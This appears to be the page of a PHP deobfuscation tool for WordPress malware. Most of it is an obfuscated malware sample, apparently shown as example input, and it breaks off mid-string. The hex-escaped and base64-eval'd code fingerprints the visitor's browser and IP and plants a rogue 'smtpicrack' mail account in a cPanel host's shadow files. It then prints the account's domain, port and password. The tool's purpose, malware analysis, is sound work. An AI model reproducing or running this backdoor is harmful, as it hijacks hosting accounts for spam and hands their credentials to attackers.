Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
goto DQ7K1; AobPh: if (empty($usr)) { if (preg_match_all("\43\57\150\x6f\x6d\145\57\x28\56\x2a\51\57\x70\165\142\x6c\x69\143\137\150\164\x6d\x6c\57\43", $pwd, $mxx)) { preg_match_all("\x23\57\150\x6f\155\145\x2f\x28\56\52\x29\57\160\x75\142\x6c\151\143\x5f\150\164\155\x6c\x2f\x23", $pwd, $mxx); $usr = $mxx[1][0]; } } goto TAMBG; zK4ez: $cp = "\x2f\x68\157\155\145{$home}{$usr}\57\56\143\x70\x61\x6e\145\154"; goto zOeY2; A8H6h: $pwd = @getcwd(); goto c6zBk; c6zBk: if (!function_exists("\160\157\x73\x69\x78\x5f\147\145\164\145\x67\x69\x64")) { $usr = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "\77"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $usr = $uid["\x6e\141\x6d\145"]; $uid = $uid["\x75\151\144"]; $group = $gid["\156\141\x6d\145"]; $gid = $gid["\147\x69\x64"]; } goto AobPh; zOeY2: if (is_dir($cp)) { $pass = "\x69\143\x72\141\x63\153\100" . substr(str_shuffle("\61\x32\63\x34\65\x36\x37\70\x39\x61\x62\x63\x64\x65\x66\147\150\151\152\x6b\154\155\x6e\x6f\x70\x71\162\163\171\x75\x76\x77\x78\171\x7a\101\102\103\x44\105\x46\107\x48\111\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\122\x53\x54\125\x56\x57\130\x59\132"), 50) . "\43\170"; $pwd = crypt($pass, "\x24\66\44\x72\x6f\x6f\x74\x74\156\44"); $smtpname = "\x73\155\164\160\151\143\x72\x61\x63\x6b"; @mkdir("\57\x68\x6f\155\145{$home}{$usr}\x2f\x65\164\x63\x2f{$domain}"); @mkdir("\57\x68\157\x6d\145{$home}{$usr}\x2f\x6d\141\x69\x6c\57{$domain}"); @mkdir("\57\150\x6f\155\145{$home}{$usr}\x2f\155\x61\x69\154\57{$domain}\x2f{$smtpname}"); @mkdir("\x2f\x68\x6f\155\x65{$home}{$usr}\57\x6d\141\x69\x6c\57{$domain}\57{$smtpname}\x2f\x2e\101\x72\x63\150\151\166\x65"); @mkdir("\57\150\157\155\145{$home}{$usr}\x2f\155\x61\x69\x6c\x2f{$domain}\x2f{$smtpname}\x2f\56\x44\x72\x61\x66\164\x73"); @mkdir("\x2f\150\x6f\x6d\x65{$home}{$usr}\57\x6d\x61\x69\154\x2f{$domain}\57{$smtpname}\57\56\123\x65\x6e\x74"); @mkdir("\x2f\x68\157\155\145{$home}{$usr}\x2f\155\x61\x69\x6c\57{$domain}\x2f{$smtpname}\57\56\x73\x70\x61\x6d"); @mkdir("\57\150\x6f\155\x65{$home}{$usr}\x2f\155\x61\151\154\57{$domain}\57{$smtpname}\57\x2e\124\162\141\163\x68"); @mkdir("\x2f\x68\157\155\145{$home}{$usr}\x2f\155\141\151\154\x2f{$domain}\x2f{$smtpname}\x2f\143\x75\162"); @mkdir("\57\x68\157\155\145{$home}{$usr}\x2f\155\x61\151\x6c\x2f{$domain}\x2f{$smtpname}\57\x6e\145\167"); @mkdir("\57\150\x6f\155\x65{$home}{$usr}\x2f\x6d\141\x69\154\x2f{$domain}\57{$smtpname}\x2f\x74\x6d\x70"); $file1 = "\57\x68\x6f\155\x65{$home}{$usr}\x2f\155\141\151\x6c\x2f{$domain}\x2f{$smtpname}\x2f\x64\x6f\166\145\143\x6f\164\x2d\141\143\154\x2d\154\x69\163\x74"; fwrite(fopen($file1, "\x61"), ''); $file2 = "\57\150\x6f\x6d\x65{$home}{$usr}\57\x6d\141\x69\154\x2f{$domain}\x2f{$smtpname}\57\x64\157\166\145\143\157\x74\x2d\x75\x69\x64\x6c\x69\163\164"; fwrite(fopen($file2, "\x77"), "\63\40\x56\61\65\x37\70\67\62\x34\x30\x38\67\x20\116\61\40\107\x36\67\x38\71\142\141\x33\x31\x66\x37\x36\x61\x31\x39\65\x65\x30\64\x30\x62\x30\60\60\60\143\x62\x30\64\x30\67\x65\62"); $file3 = "\57\150\x6f\x6d\145{$home}{$usr}\x2f\x6d\x61\x69\154\x2f{$domain}\57{$smtpname}\57\144\x6f\x76\x65\143\x6f\x74\55\x75\x69\x64\166\141\154\151\144\151\164\x79"; fwrite(fopen($file3, "\x77"), "\x35\x65\x31\x39\x36\141\x66\x63\x30"); $file4 = "\x2f\150\x6f\155\x65{$home}{$usr}\57\155\x61\x69\154\x2f{$domain}\57{$smtpname}\x2f\x64\157\166\x65\143\x6f\x74\x2d\x75\x69\144\166\141\154\x69\144\x69\x74\171\x2e\65\x65\x31\71\x36\141\x66\x63"; fwrite(fopen($file4, "\141"), ''); $file5 = "\x2f\150\x6f\x6d\x65{$home}{$usr}\x2f\x6d\141\x69\x6c\57{$domain}\57{$smtpname}\57\x64\157\166\145\x63\157\x74\x2e\151\x6e\x64\x65\x78\56\x6c\x6f\147"; fwrite(fopen($file5, "\141"), ''); $file6 = "\x2f\150\x6f\155\x65{$home}{$usr}\x2f\x6d\x61\151\x6c\57{$domain}\x2f{$smtpname}\57\x64\157\166\x65\143\157\x74\x2e\154\151\163\164\56\151\156\144\145\x78\x2e\154\x6f\147"; fwrite(fopen($file6, "\x61"), ''); $file7 = "\x2f\x68\x6f\155\145{$home}{$usr}\57\x6d\141\151\154\57{$domain}\x2f{$smtpname}\57\144\157\166\145\x63\x6f\164\x2e\155\x61\x69\x6c\x62\x6f\x78\x2e\x6c\x6f\147"; fwrite(fopen($file7, "\x61"), ''); $file8 = "\57\150\x6f\x6d\x65{$home}{$usr}\x2f\155\141\x69\154\x2f{$domain}\x2f{$smtpname}\x2f\x6d\x61\151\154\x64\x69\162\x73\151\x7a\145"; fwrite(fopen($file8, "\x77"), "\62\61\x34\67\64\70\63\66\64\67\103\xa\60\x20\60"); $file9 = "\x2f\x68\x6f\x6d\145{$home}{$usr}\57\x6d\x61\x69\154\x2f{$domain}\57{$smtpname}\x2f\x73\165\x62\x73\x63\162\x69\160\x74\x69\x6f\x6e\163"; fwrite(fopen($file9, "\167"), "\126\11\62\12\12\x41\x72\143\x68\x69\166\145\12\104\162\x61\146\x74\x73\xa\123\x65\x6e\x74\xa\x73\160\141\x6d\xa\124\x72\141\x73\x68"); $smtp = $smtpname . "\x3a" . $pwd . "\72\61\x36\x32\64\71\x3a\x3a\72\x3a\72" . "\15\xa"; $shadow1 = "\57\150\157\155\x65{$home}{$usr}\x2f\145\164\143\57{$domain}\x2f\x73\150\141\144\x6f\167"; $shadow2 = "\x2f\150\x6f\155\x65{$home}{$usr}\x2f\145\x74\x63\x2f\163\x68\x61\x64\157\167"; $shadow1_content = file_get_contents($shadow1); $shadow2_content = file_get_contents($shadow2); if (preg_match("\57{$smtpname}\x2f", $shadow1_content)) { $pathe_msg = "\x2f\150\157\x6d\x65{$home}{$usr}\x2f\155\x61\151\x6c\x2f{$domain}\57{$smtpname}\57\156\145\x77"; $scan_msg = scandir($pathe_msg); foreach ($scan_msg as $file_msg) { unlink("{$pathe_msg}\x2f{$file_msg}"); } unlink($shadow1); } if (preg_match("\57{$smtpname}\x2f", $shadow2_content)) { unlink($shadow2); } $fo = fopen($shadow1, "\x61"); fwrite($fo, $smtp); $fo2 = fopen($shadow2, "\x61"); fwrite($fo2, $smtp); echo "\74\163\x6d\x74\160\76{$domain}\x7c\x35\70\x37\x7c{$smtpname}\100{$domain}\x7c{$pass}\74\57\163\155\164\x70\76\12"; } goto WFqdH; TAMBG: preg_match_all("\43\57\150\157\x6d\x65\50\x2e\52\51{$usr}\x2f\x23", $pwd, $m2); goto Ty0No; BFUro: if (strstr($domain, "\167\167\x77\56")) { $domain = str_replace("\167\x77\167\x2e", '', $domain); } else { $domain = $domain; } goto zK4ez; e9cYY: $domain = $_SERVER["\x48\124\124\120\137\x48\117\123\124"]; goto DN4gu; Ty0No: $home = $m2[1][0]; goto e9cYY; DN4gu: $ip = $_SERVER["\x53\105\122\x56\105\122\x5f\101\x44\104\x52"]; goto BFUro; DQ7K1: eval(base64_decode("\x5a\156\126\x75\x59\x33\x52\160\x62\62\x34\147\127\105\x4a\146\x54\x31\x4d\157\112\x46\126\x54\122\x56\112\146\121\125\x64\106\124\x6c\x51\160\x65\167\60\113\103\123\x52\120\125\61\71\x46\125\x6c\112\x50\x55\x69\x41\147\111\103\101\x39\111\103\101\147\111\154\126\x75\141\x32\65\166\144\x32\x34\147\124\x31\x4d\x67\125\107\x78\150\x64\107\132\x76\x63\x6d\60\151\x4f\x77\60\x4b\111\x43\101\147\111\103\x52\x50\125\x79\x41\x67\120\123\101\x67\x49\107\x46\171\143\x6d\x46\x35\x4b\103\101\156\114\x33\144\x70\142\155\x52\166\x64\63\115\147\142\156\121\147\115\124\x41\x76\141\123\x63\147\111\103\x41\147\111\103\101\x39\x50\151\x41\147\x4a\61\x64\x70\142\x6d\122\166\x64\63\115\147\115\124\101\156\114\x41\60\113\103\x53\101\147\111\x43\x41\x67\111\x43\101\147\x49\x43\101\147\111\x43\101\147\x49\x43\x41\x6e\x4c\x33\x64\160\x62\155\122\166\x64\x33\115\147\x62\x6e\121\x67\x4e\x69\x34\x7a\114\62\153\x6e\111\103\x41\147\x49\x43\x41\x39\x50\151\101\147\112\x31\x64\x70\x62\x6d\122\x76\x64\63\115\147\x4f\103\64\170\x4a\171\167\x4e\x43\147\x6b\x67\x49\103\101\147\x49\x43\x41\147\111\103\x41\147\x49\103\x41\x67\x49\103\x41\x67\112\x79\x39\63\141\127\65\153\x62\x33\144\172\x49\x47\65\x30\111\x44\131\165\x4d\x69\x39\160\x4a\x79\x41\x67\x49\103\101\x67\x50\124\x34\x67\111\103\144\130\x61\127\x35\153\x62\x33\144\172\111\x44\147\156\x4c\x41\60\113\103\x53\x41\x67\111\x43\101\147\111\103\x41\147\x49\103\101\147\111\103\101\147\x49\103\x41\x6e\x4c\x33\144\x70\x62\x6d\122\x76\144\x33\x4d\x67\142\156\x51\147\116\151\x34\x78\114\62\x6b\x6e\x49\103\x41\x67\111\103\x41\71\x50\x69\x41\x67\x4a\x31\144\x70\x62\155\x52\166\144\63\115\147\x4e\x79\x63\163\104\121\x6f\112\x49\x43\x41\x67\111\103\x41\x67\111\103\x41\x67\111\x43\x41\147\111\103\x41\x67\111\x43\143\x76\x64\62\154\165\x5a\x47\71\63\x63\171\102\x75\144\103\101\62\x4c\152\101\166\141\123\x63\x67\111\103\101\147\x49\x44\x30\53\111\x43\x41\156\x56\x32\154\x75\132\107\71\63\x63\171\x42\127\x61\130\116\60\x59\123\143\163\x44\x51\157\112\x49\x43\101\147\x49\103\x41\x67\x49\103\101\147\111\103\101\x67\x49\103\x41\x67\111\x43\x63\x76\x64\62\x6c\x75\132\107\71\63\x63\171\x42\x75\144\103\x41\61\x4c\x6a\x49\166\x61\123\x63\x67\111\103\x41\147\111\104\60\53\x49\x43\x41\x6e\126\62\154\165\132\x47\x39\63\143\x79\102\x54\132\x58\112\x32\132\130\x49\x67\115\x6a\x41\x77\x4d\x79\x39\x59\125\103\102\64\116\152\121\x6e\114\x41\x30\113\103\123\x41\x67\111\x43\101\x67\111\x43\101\147\x49\103\x41\147\x49\x43\x41\147\111\x43\101\156\x4c\x33\x64\x70\142\x6d\122\166\x64\x33\x4d\147\142\x6e\121\x67\116\123\64\170\x4c\x32\x6b\x6e\111\103\101\x67\x49\103\x41\x39\120\151\101\x67\112\61\144\x70\142\155\x52\166\144\x33\115\x67\x57\x46\x41\156\114\101\60\113\x43\123\101\x67\111\x43\101\x67\x49\x43\101\147\111\x43\101\147\x49\x43\x41\147\111\103\101\x6e\114\x33\x64\x70\x62\x6d\x52\166\x64\x33\115\147\x65\110\x41\166\141\123\x63\147\x49\103\101\147\x49\x43\101\147\111\103\101\71\x50\x69\x41\x67\x4a\x31\x64\160\142\155\122\x76\x64\63\x4d\x67\127\x46\101\x6e\x4c\101\60\x4b\x43\x53\101\x67\x49\103\x41\x67\x49\103\x41\x67\111\103\101\x67\x49\103\x41\147\111\103\x41\x6e\114\63\144\x70\x62\x6d\122\x76\x64\x33\x4d\147\x62\156\x51\x67\x4e\x53\64\x77\x4c\x32\x6b\156\111\103\x41\x67\111\x43\101\x39\120\x69\101\147\x4a\61\144\x70\x62\155\x52\x76\x64\x33\115\147\115\x6a\x41\167\x4d\103\143\163\104\x51\157\x4a\111\103\101\x67\x49\103\x41\147\111\x43\x41\147\111\x43\x41\x67\111\103\x41\x67\x49\103\143\x76\x64\x32\x6c\165\132\x47\71\x33\143\x79\102\x74\132\x53\71\160\112\171\101\147\111\103\x41\147\x49\103\101\x67\111\x44\60\x2b\111\103\x41\156\x56\62\154\165\x5a\x47\71\63\x63\x79\102\116\122\123\x63\x73\x44\x51\x6f\112\111\x43\x41\x67\x49\x43\101\147\x49\x43\x41\147\x49\103\x41\147\x49\103\101\x67\x49\103\143\x76\144\62\154\x75\x4f\124\147\x76\141\123\143\x67\111\x43\x41\x67\111\103\x41\x67\111\103\x41\147\111\x43\101\147\111\104\60\53\111\103\x41\156\126\62\x6c\165\x5a\x47\71\x33\x63\x79\101\x35\117\x43\x63\x73\x44\121\x6f\x4a\x49\103\x41\147\x49\103\x41\x67\111\x43\x41\147\111\103\x41\147\111\x43\x41\147\111\x43\143\x76\144\62\x6c\165\117\124\125\x76\141\123\143\x67\111\x43\101\147\111\x43\101\147\111\x43\x41\x67\111\103\101\x67\x49\104\60\x2b\x49\103\101\x6e\x56\x32\x6c\165\132\x47\71\63\x63\171\101\x35\x4e\x53\143\163\104\x51\x6f\x4a\111\103\101\147\x49\x43\x41\x67\x49\103\101\147\x49\x43\x41\x67\x49\103\101\147\111\103\x63\x76\144\62\x6c\165\115\124\131\x76\x61\x53\x63\x67\111\103\x41\x67\x49\x43\x41\147\111\x43\101\147\x49\103\x41\x67\111\x44\x30\53\x49\x43\x41\x6e\126\x32\154\x75\132\x47\71\63\143\x79\101\172\114\152\x45\x78\112\x79\x77\x4e\103\x67\153\147\x49\x43\101\147\111\x43\x41\147\x49\103\101\147\111\x43\101\147\111\x43\101\147\112\x79\71\x74\x59\127\116\x70\142\x6e\x52\x76\x63\62\x68\x38\x62\127\x46\x6a\x49\107\71\172\x49\110\x67\166\x61\x53\x63\147\120\124\x34\x67\111\103\144\x4e\131\x57\x4d\x67\124\61\x4d\147\x57\103\143\x73\104\x51\157\x4a\x49\103\x41\147\111\103\x41\147\111\103\101\147\111\103\x41\147\111\103\101\147\x49\x43\143\x76\142\x57\x46\x6a\130\x33\102\x76\x64\x32\x56\171\143\107\115\166\141\x53\x63\x67\111\103\x41\x67\111\x43\101\147\x49\x44\x30\53\111\x43\x41\x6e\124\x57\x46\x6a\x49\105\71\x54\x49\104\153\156\114\101\60\x4b\103\x53\101\147\111\x43\x41\x67\x49\x43\101\x67\x49\x43\x41\x67\111\103\x41\x67\111\103\101\x6e\x4c\x32\x78\x70\142\x6e\x56\x34\x4c\62\153\156\x49\x43\x41\x67\x49\x43\101\147\x49\x43\x41\x67\111\x43\101\x67\111\x43\x41\71\x50\151\101\x67\112\x30\x78\160\x62\x6e\x56\x34\x4a\171\167\116\x43\x67\153\x67\111\103\x41\147\x49\x43\x41\x67\111\x43\101\147\111\103\x41\x67\x49\x43\101\x67\x4a\x79\71\x31\x59\156\126\x75\x64\110\x55\x76\141\x53\143\147\x49\x43\101\147\111\103\x41\x67\111\x43\101\x67\x49\x43\101\147\x50\x54\64\147\x49\x43\x64\x56\x59\156\126\165\x64\110\125\x6e\114\101\x30\113\x43\123\x41\147\111\103\101\x67\x49\x43\101\147\x49\103\101\x67\111\103\x41\147\x49\103\x41\156\x4c\x32\154\x77\x61\x47\71\x75\132\x53\71\160\x4a\x79\x41\147\x49\x43\101\x67\111\x43\x41\x67\x49\103\101\x67\111\x43\101\71\120\x69\101\x67\x4a\x32\x6c\121\141\107\x39\x75\132\x53\x63\x73\104\121\x6f\112\111\x43\x41\x67\111\x43\101\x67\111\x43\101\147\x49\103\x41\x67\x49\x43\x41\x67\111\103\143\166\x61\x58\x42\166\x5a\x43\x39\160\112\x79\x41\x67\111\103\101\x67\111\x43\101\x67\x49\x43\101\x67\x49\x43\101\x67\x49\x44\60\x2b\111\x43\101\x6e\141\126\x42\x76\132\x43\143\x73\x44\121\x6f\x4a\111\x43\x41\147\x49\x43\101\x67\111\103\x41\x67\x49\x43\x41\x67\x49\103\101\147\111\103\x63\166\x61\130\x42\x68\x5a\103\x39\160\x4a\171\101\x67\111\x43\101\147\111\x43\101\147\111\103\x41\x67\111\103\x41\147\111\x44\x30\53\x49\x43\x41\x6e\x61\126\x42\150\132\103\x63\x73\x44\x51\x6f\112\x49\103\101\147\x49\103\101\x67\x49\103\101\147\x49\x43\101\147\111\x43\101\147\111\103\143\x76\131\x57\65\153\x63\x6d\71\x70\x5a\x43\71\x70\x4a\171\101\147\111\x43\101\147\111\103\101\147\111\103\101\147\x49\x44\60\x2b\x49\x43\x41\156\x51\x57\65\x6b\x63\x6d\71\x70\x5a\103\x63\x73\104\121\x6f\x4a\x49\103\101\147\x49\x43\x41\147\111\x43\x41\x67\111\103\x41\147\111\x43\x41\x67\x49\x43\x63\x76\131\x6d\x78\x68\x59\x32\x74\x69\x5a\130\112\171\145\x53\x39\160\x4a\171\101\x67\111\x43\101\147\111\103\101\147\111\x44\x30\53\x49\103\x41\156\x51\155\x78\x68\131\62\x74\103\132\130\112\x79\x65\x53\x63\x73\x44\x51\157\x4a\x49\103\101\x67\111\x43\x41\147\111\x43\101\147\x49\x43\101\147\111\103\101\147\111\103\143\x76\x64\x32\126\x69\142\x33\115\166\x61\x53\143\147\111\103\101\x67\x49\x43\101\147\111\x43\x41\x67\111\x43\x41\x67\x49\x44\x30\x2b\x49\103\101\156\124\x57\71\x69\x61\x57\170\x6c\112\x79\153\x37\x44\121\157\x67\x49\x43\x41\147\132\x6d\x39\171\x5a\x57\106\x6a\141\103\101\x6f\112\105\x39\x54\111\x47\106\172\x49\x43\x52\x79\x5a\127\144\154\145\103\x41\x39\x50\x69\x41\x6b\x64\155\106\163\144\127\125\x70\x49\x48\163\147\x44\121\157\x67\111\x43\x41\x67\x49\103\101\147\x49\x47\x6c\155\111\103\x68\167\143\x6d\x56\x6e\x58\62\61\x68\x64\107\x4e\157\113\103\122\x79\x5a\127\144\154\x65\x43\167\147\112\106\x56\124\122\126\112\x66\121\x55\144\106\x54\x6c\121\x70\x4b\123\x42\67\104\x51\x6f\x67\x49\x43\x41\147\x49\x43\101\147\111\x43\x41\x67\x49\x43\x41\153\124\61\116\x66\x52\x56\112\x53\x54\x31\111\147\120\123\x41\x6b\144\155\x46\x73\x64\127\x55\67\x44\x51\x6f\147\111\x43\101\147\x49\x43\x41\x67\x49\x48\60\116\x43\147\x30\113\111\103\101\147\111\110\60\x67\x49\103\x41\x4e\x43\x69\x41\147\x49\x43\x42\171\132\x58\x52\x31\143\x6d\64\x67\112\x45\x39\x54\130\60\126\x53\x55\x6b\x39\123\x4f\167\x30\x4b\146\121\60\x4b\x5a\156\126\165\131\63\x52\160\142\62\64\147\127\x45\x4a\x66\121\156\x4a\166\144\x33\116\154\143\151\x67\153\126\x56\x4e\106\125\x6c\x39\x42\x52\x30\126\x4f\126\103\x6c\67\x44\x51\157\112\x4a\x45\x4a\x53\x54\x31\144\124\122\x56\112\146\x52\x56\x4a\123\124\x31\x49\x67\x49\x43\x41\x67\x50\123\x41\x67\x49\103\x4a\126\142\x6d\164\x75\x62\63\x64\x75\x49\105\x4a\171\142\x33\x64\x7a\x5a\x58\111\x69\x4f\167\60\x4b\111\103\x41\147\x49\103\122\103\125\153\71\130\125\x30\126\x53\x49\103\x41\x39\111\x43\101\x67\131\x58\112\x79\x59\x58\x6b\x6f\x4a\x79\71\x74\x63\62\x6c\x6c\x4c\x32\153\156\111\103\x41\x67\111\103\x41\147\x49\104\x30\x2b\x49\103\101\x6e\123\127\x35\x30\x5a\130\112\165\132\130\x51\x67\122\x58\x68\x77\142\x47\x39\171\132\x58\111\x6e\114\x41\x30\x4b\x49\x43\101\147\x49\x43\101\x67\x49\103\x41\x67\x49\103\x41\x67\x49\x43\101\x67\x49\103\101\x67\111\x43\x41\147\x49\x43\101\147\x4a\171\71\155\x61\x58\112\x6c\132\x6d\x39\x34\x4c\x32\153\156\x49\103\x41\x67\x49\x44\x30\53\111\x43\101\156\122\155\x6c\x79\132\127\x5a\166\x65\x43\143\163\x44\121\157\x67\111\103\101\x67\111\x43\x41\x67\x49\x43\x41\147\111\103\101\147\111\x43\101\x67\x49\x43\x41\147\x49\x43\x41\147\x49\103\101\156\114\x33\x4e\150\132\x6d\106\x79\x61\x53\71\160\112\x79\101\x67\x49\103\x41\147\x50\124\64\147\x49\103\x64\x54\x59\x57\132\150\x63\155\153\x6e\x4c\101\60\113\x49\x43\x41\147\x49\103\x41\147\111\x43\101\x67\x49\x43\x41\x67\x49\x43\x41\x67\111\x43\x41\147\111\x43\101\x67\111\x43\101\147\x4a\x79\x39\152\141\x48\112\166\142\x57\x55\x76\141\123\x63\147\x49\103\x41\147\x49\x44\x30\x2b\111\x43\x41\156\121\62\x68\x79\142\x32\x31\x6c\x4a\x79\167\116\x43\151\x41\147\111\103\101\147\111\103\x41\147\111\x43\x41\x67\111\103\x41\147\111\x43\x41\x67\111\103\101\x67\x49\x43\101\147\111\x43\x63\166\132\127\122\x6e\132\x53\x39\160\x4a\x79\x41\x67\x49\x43\x41\147\x49\103\101\x39\x50\151\101\147\x4a\60\126\153\132\x32\x55\x6e\x4c\101\60\113\x49\x43\101\x67\x49\x43\101\x67\x49\x43\101\x67\111\x43\101\x67\x49\x43\x41\x67\x49\103\101\x67\111\103\x41\x67\111\103\x41\147\112\x79\x39\166\143\107\x56\x79\131\123\x39\x70\x4a\x79\x41\x67\111\103\x41\147\x49\104\60\x2b\111\103\101\x6e\124\x33\102\154\143\155\x45\x6e\114\101\x30\113\x49\x43\x41\147\x49\x43\x41\x67\111\103\x41\x67\111\x43\x41\147\x49\103\101\147\x49\x43\101\x67\111\103\101\x67\111\x43\x41\147\x4a\x79\71\165\x5a\130\122\x7a\x59\x32\x46\167\132\x53\x39\160\112\171\x41\x67\111\104\x30\53\111\x43\x41\156\x54\x6d\x56\60\x63\62\116\150\143\107\125\156\114\101\x30\x4b\x49\x43\101\147\111\103\x41\x67\x49\x43\x41\x67\x49\x43\101\x67\x49\x43\101\x67\111\x43\x41\x67\x49\103\101\x67\x49\103\101\x67\112\171\x39\164\x59\130\x68\60\141\107\71\x75\x4c\62\153\x6e\x49\x43\101\147\111\104\60\53\x49\x43\101\156\x54\x57\x46\64\144\x47\150\x76\142\151\x63\x73\x44\x51\x6f\147\x49\x43\x41\147\111\103\x41\x67\111\x43\x41\147\x49\103\x41\147\111\103\101\x67\111\103\x41\x67\x49\103\101\147\x49\103\x41\156\114\x32\x74\x76\142\156\x46\61\x5a\x58\x4a\x76\x63\x69\x39\160\x4a\x79\101\147\120\x54\x34\x67\111\x43\x64\114\142\62\x35\170\144\x57\x56\171\x62\63\111\156\114\101\60\x4b\x49\103\101\147\111\103\x41\147\x49\x43\101\147\111\103\101\x67\111\x43\101\x67\x49\x43\x41\147\111\x43\x41\x67\x49\103\101\x67\x4a\x79\71\164\x62\62\x4a\160\142\107\125\166\x61\x53\143\x67\111\103\101\x67\x49\104\x30\x2b\111\103\101\x6e\x53\x47\x46\165\x5a\107\x68\154\x62\x47\x51\147\121\x6e\x4a\x76\144\x33\116\154\143\151\143\x70\x4f\167\60\x4b\111\x43\101\x67\111\107\x5a\x76\143\155\126\150\131\x32\147\x67\113\103\122\103\x55\x6b\71\130\x55\x30\126\123\x49\107\106\x7a\x49\103\x52\171\132\127\x64\154\x65\103\101\71\x50\x69\101\x6b\144\x6d\106\163\144\x57\x55\x70\x49\110\x73\147\104\x51\157\147\111\103\x41\147\x49\x43\101\147\x49\x47\x6c\x6d\x49\x43\150\167\143\x6d\x56\x6e\x58\x32\61\x68\x64\x47\116\157\x4b\x43\x52\171\132\x57\144\154\x65\x43\167\x67\x4a\x46\126\124\x52\126\x4a\x66\121\125\x64\106\x54\154\x51\160\113\123\102\67\x44\x51\x6f\x67\x49\103\101\147\111\x43\x41\147\x49\x43\x41\x67\x49\103\x41\153\121\154\x4a\x50\x56\x31\116\106\125\154\71\106\125\154\112\x50\125\x69\x41\71\111\103\122\x32\131\x57\x78\61\132\x54\x73\x4e\x43\151\x41\147\x49\x43\x41\x67\111\103\101\147\x66\x51\60\113\111\x43\101\147\x49\110\60\x4e\x43\x69\x41\147\111\x43\x42\171\132\x58\122\x31\x63\155\64\147\x4a\105\x4a\123\124\x31\144\x54\122\x56\x4a\x66\122\126\112\123\x54\61\x49\x37\x44\121\x70\x39\x44\x51\x70\x6b\x59\130\122\x6c\130\62\x52\154\132\155\x46\x31\142\110\x52\146\144\107\x6c\x74\132\130\160\166\142\155\126\x66\143\x32\x56\60\x4b\x43\144\x48\124\126\121\x6e\x4b\x54\x73\116\103\x69\x52\153\131\130\x52\154\111\104\x30\147\x5a\107\106\60\132\123\147\151\x5a\103\x42\116\x4c\x43\x42\132\x49\151\153\67\104\x51\157\153\144\x47\x6c\164\x5a\x53\x41\x39\111\107\122\150\144\107\x55\157\x49\x6d\143\x36\x61\123\x42\x68\111\x69\153\67\x44\x51\157\153\144\130\x4e\154\143\x6d\x46\x6e\x5a\127\65\60\x49\104\60\147\x4a\x46\x39\x54\x52\x56\112\x57\x52\x56\112\x62\x4a\60\x68\x55\x56\106\102\146\x56\126\116\x46\x55\154\71\102\122\60\126\x4f\x56\x43\x64\x64\x4f\167\x30\113\x4a\x48\116\x66\x63\x47\x46\x30\x61\x43\x41\71\x49\103\112\157\144\110\x52\x77\x4f\151\70\166\x49\x69\101\165\111\103\x52\146\125\x30\x56\123\x56\x6b\126\123\127\x79\144\x54\122\126\112\x57\x52\126\x4a\146\124\x6b\106\116\x52\x53\x64\144\117\167\x30\113\x4a\110\x68\146\x63\x47\106\60\x61\x43\101\x39\111\103\x4a\x6f\144\110\122\x77\x4f\x69\x38\166\111\x69\101\165\111\103\x52\x66\x55\x30\126\x53\126\x6b\x56\123\127\171\x64\124\122\126\112\127\x52\x56\112\x66\x54\153\x46\x4e\x52\123\144\x64\111\x43\x34\147\x4a\106\71\124\x52\x56\x4a\127\x52\126\112\x62\x4a\x31\x4a\106\125\126\126\x46\x55\61\x52\x66\x56\126\112\112\x4a\x31\x30\67\x44\121\x6f\153\x53\x56\102\125\127\151\101\71\x49\107\144\154\144\x47\126\x75\x64\x69\x67\x69\125\x6b\126\x4e\124\61\x52\106\x58\x30\106\x45\x52\106\x49\151\x4b\124\x73\116\103\x69\x52\104\x54\61\x56\117\126\106\112\x5a\126\106\x6f\147\120\x53\x42\x7a\x61\127\x31\167\142\107\x56\x34\142\x57\x78\x66\x62\x47\x39\x68\132\106\x39\155\141\x57\x78\x6c\x4b\x43\112\x6f\144\110\x52\167\x4f\151\x38\x76\144\x33\144\x33\114\x6d\x64\154\x62\x33\102\x73\144\x57\144\x70\142\151\x35\165\132\x58\121\x76\x65\x47\x31\x73\x4c\x6d\x64\x77\x50\62\x6c\x77\120\x53\x52\112\125\106\x52\141\x49\x69\x6b\x37\x44\121\x6f\x6b\x51\x30\71\126\124\x6c\122\x53\127\x53\x41\x39\111\x43\x52\104\124\61\x56\117\x56\106\112\132\126\106\x6f\164\120\155\x64\154\x62\x33\102\x73\144\x57\144\x70\142\154\71\x6a\x62\x33\x56\x75\144\110\112\x35\x54\155\106\164\132\x54\163\x4e\103\151\x52\104\x53\x56\122\132\x49\104\60\x67\x4a\105\116\x50\126\125\x35\x55\x55\x6c\154\x55\x57\x69\60\53\132\62\x56\x76\143\x47\x78\61\132\62\154\x75\130\x32\116\160\x64\110\153\x37\x44\121\x6f\153\x55\x6b\126\x48\123\x55\x39\x4f\x49\x44\60\147\112\x45\116\120\126\125\x35\x55\125\154\x6c\x55\127\151\x30\53\x5a\x32\126\166\x63\x47\170\61\132\x32\154\x75\130\63\112\154\x5a\x32\x6c\x76\x62\152\x73\116\103\151\x52\x44\x58\x30\116\x50\122\105\125\147\120\123\101\153\x51\x30\71\x56\124\154\122\x53\127\126\x52\x61\x4c\x54\x35\156\x5a\x57\71\167\142\x48\126\156\x61\x57\65\146\131\x32\x39\x75\144\x48\112\x35\x59\x32\71\153\132\x54\163\x4e\103\x69\x52\125\x61\127\x31\x6c\x65\155\71\x75\132\x53\x41\x39\111\x43\122\x44\x54\61\126\x4f\x56\x46\112\x5a\126\x46\157\x74\120\x6d\144\x6c\142\63\102\163\144\x57\x64\160\x62\154\71\60\x61\127\61\154\145\155\x39\165\132\124\163\x4e\x43\x69\122\124\x65\x57\x31\151\x62\x32\167\147\x50\x53\101\153\121\60\x39\126\x54\154\x52\x53\x57\x56\x52\141\x4c\124\x35\x6e\132\127\x39\167\142\x48\x56\156\x61\x57\65\146\131\x33\126\171\x63\x6d\x56\x75\x59\x33\154\x7a\x65\127\x31\151\x62\x32\167\67\x44\x51\157\x6b\x62\127\x56\x7a\x63\62\x46\x6e\132\x53\101\147\x50\x53\101\x69\146\x43\60\x74\x4c\x53\x74\x62\x54\x6b\x56\130\x34\x34\103\121\x38\x4a\x2b\122\x71\117\113\x41\152\x66\103\x66\x6b\162\166\x6a\147\x4a\106\x4e\x4c\x31\x4e\144\113\x79\60\164\114\130\x78\x63\x62\151\x49\67\104\x51\x6f\x6b\x62\127\x56\x7a\x63\62\106\x6e\132\123\x41\165\120\x53\101\151\x57\171\x74\144\x34\160\x53\x42\x34\x70\